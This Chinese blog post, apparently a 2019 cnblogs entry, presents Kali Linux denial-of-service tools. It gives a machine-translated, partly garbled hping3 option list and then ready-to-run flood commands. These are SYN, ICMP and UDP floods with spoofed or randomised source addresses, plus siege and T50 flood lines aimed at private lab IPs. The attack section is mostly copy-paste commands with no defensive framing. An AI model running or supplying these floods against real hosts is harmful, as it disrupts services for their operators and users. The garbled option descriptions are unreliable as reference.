kali linux之拒绝服务攻击工具

hping3

几乎可以定制发送任何TCP/IP数据包,用于测试FW,端口扫描,性能测试

 

-c - 计数包计数
  -i - interval wait(uX表示X微秒,例如-i u1000)
       - -i u10000的快速别名(第二个10个数据包)
       - -i u1000的快速别名(第二个100个数据包)
       --flood尽可能快地发送数据包。不要显示回复。
  -n - 数字数字输出
  -q - 安静
  -I - 接口接口名称(否则为默认路由接口)
  -V - verbose verbose模式
  -D - 调试调试信息
  -z - 绑定ctrl + z到ttl(默认为dst端口)
  -Z - unbind unbind ctrl + z - 为收到的每个匹配数据包发出蜂鸣声


模式
  默认模式TCP
  -0 - RAIP RAW IP模式
  -1 - icmp ICMP模式
  -2 - 表示UDP模式
  -8 - 扫描SCAN模式。示例:hping --scan 1-30,70-90 -S www.target.host
  -9 - 听听模式


IP
  -a - 欺骗欺骗源地址
  --rand-dest随机destionation地址模式。看到那个男人。
  --rand-source随机源地址模式。看到那个男人。
  -t --ttl ttl(默认64)
  -N - id id(默认随机)
  -W --winid使用win * id字节排序
  -r --rel相对化id字段(估计主机流量)
  -f --frag分割更多碎片的数据包。 (可以通过弱acl)
  -x --morefrag设置更多片段标志
  -y --dontfrag set不分片标志
  -g --fragoff设置片段偏移量
  -m --mtu设置虚拟mtu,暗示--frag如果数据包大小> mtu
  -o --tos服务类型(默认为0x00),尝试--tos帮助
  -G --rroute包含RECORD_ROUTE选项并显示路由缓冲区
  --lsrr松散的源路由和记录路由
  --ssrr严格的源路由和记录路由
  -H --ipproto仅在RAW IP模式下设置IP协议字段


ICMP
  -C --icmptype icmp type(默认回显请求)
  -K - icmpcode icmp code(默认为0)
      --force-icmp发送所有icmp类型(默认发送仅支持的类型)
      --icmp-gw设置ICMP重定向的网关地址(默认为0.0.0.0)
      --icmp-ts别名为--icmp --icmptype 13(ICMP时间戳)
      --icmp-addr别名为--icmp --icmptype 17(ICMP地址子网掩码)
      --icmp-help显示其他icmp选项的帮助


UDP / TCP
  -s --baseport基本源端口(默认随机)
  -P --destport [+] [+] <port>目标端口(默认为0)ctrl + z inc / dec
  -k - 保持静止源端口
  -w --win winsize(默认64)
  -O -​​-tcpoff设置假tcp数据偏移量(而不是tcphdrlen / 4)
  -Q --seqnum仅显示tcp序列号
  -b --badcksum(尝试)发送具有错误IP校验和的数据包
                   许多系统将修复发送数据包的IP校验和
                   所以你会得到错误的UDP / TCP校验和。
  -M --setseq设置TCP序列号
  -L --setack设置TCP确认
  -F --fin设置FIN标志
  -S --syn设置SYN标志
  -R - 首先设置RST标志
  -P --push设置PUSH标志
  -A --ack设置ACK标志
  -U - 设置URG标志
  -X --xmas设置X未使用标志(0x40)
  -Y --ymas设置Y未使用标志(0x80)
  --tcpexitcode使用最后的tcp-> th_flags作为退出代码
  --tcp-mss启用具有给定值的TCP MSS选项
  --tcp-timestamp启用TCP时间戳选项以猜测HZ /正常运行时间


同项
  -d - 数据数据大小(默认为0)
  -E - 文件中的文件数据
  -e --sign添加'签名'
  -j --dump以十六进制转储数据包
  -J --print转储可打印字符
  -B --safe启用“安全”协议
  -u --end告诉你--file何时达到EOF并防止倒带
  -T --traceroute traceroute mode(暗示--bind和--ttl 1)
  --tr-stop在traceroute模式下收到第一个非ICMP时退出
  --tr-keep-ttl保持源TTL固定,仅用于监视一跳
  --tr-no-rtt不要在traceroute模式下计算/显示RTT信息,ARS包描述(新的,不稳定的)
  --apd-send发送APD描述的数据包

 

syn flood攻击

hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.12

hping3 -S -P -U -p 80 --flood --rand-source 192.168.1.12

hping3 -SARFUP -p 80 --flood --rand-source 192.168.1.12

 

icmp flood攻击

hping3 -q -n -a 192.168.1.12 --icmp -d 56 --flood 192.168.1.10

 

udp flood攻击

hping3 -a 192.168.1.12 --udp -s 53 -d 100 -p 53 --flood 192.168.1.10

 

 

Siege:http/https压力测试工具,模拟多个用户并发访问请求
 siege -g http://192.168.1.12/xxsec.php / 192.168.1.12


T50
t50 192.168.1.12 --flood --turbo -S --protocol TCP --dport 80
t50 192.168.1.12 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22 

 

 

 友情链接 http://www.cnblogs.com/klionsec

               http://www.cnblogs.com/l0cm

               http://www.cnblogs.com/Anonyaptxxx

               http://www.feiyusafe.cn

 

posted @ 2019-03-04 16:24  Hydraxx  阅读(3911)  评论(0编辑  收藏  举报